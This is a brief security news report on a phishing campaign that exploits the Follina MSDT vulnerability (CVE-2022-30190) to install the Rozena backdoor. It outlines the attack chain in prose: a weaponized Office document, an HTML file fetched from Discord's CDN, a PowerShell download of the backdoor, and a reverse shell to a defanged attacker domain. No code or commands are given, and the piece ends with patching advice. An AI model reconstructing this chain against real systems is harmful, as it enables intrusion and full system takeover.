Researchers have spotted a phishing campaign abusing the recently disclosed Follina security vulnerability (CVE-2022-30190). The attackers are distributing the Rozena backdoor on Windows systems.
About the Rozena backdoor
Rozena is a backdoor-type malware that opens a remote shell connection that leads back to the malware author. Further, a successful connection can affect all systems connected to the network.
- Researchers from Fortinet FortiGuard Labs have discovered the Rozena campaign exploiting the Follina flaw, an RCE vulnerability that exists in the Microsoft Windows Support Diagnostic Tool (MSDT).
- The attack chain makes use of a weaponized Office document that, once clicked, connects to an external Discord CDN URL for obtaining an HTML file named index[.]htm.
- Subsequently, the HTML file uses the msdt[.]exe tool, along with a PowerShell command, which invokes another web request to obtain the Rozena backdoor and store it as Word[.]exe.
Additional insights
- The main aim of Rozena is to inject a shellcode that executes a reverse shell to the attacker’s machine (microsofto[.]duckdns[.]org), enabling them to take full control of the system.
- Once the Rozena payload is executed, it creates a process for a PowerShell command. According to experts, the decoded command does only one job - injecting the shellcode.
Conclusion
The Follina vulnerability is now being extensively exploited by cybercriminals to carry out their attacks. Those who haven’t applied the patch are the most exposed to such attacks. Thus, users should apply the patch as soon as possible and use a reliable anti-malware solution.
Publisher
/https://cyware-ent.s3.amazonaws.com/image_bank/2ee2_shutterstock_2091115930.jpg)
/https://cyware-ent.s3.amazonaws.com/image_bank/e815_shutterstock_243039496.jpg)
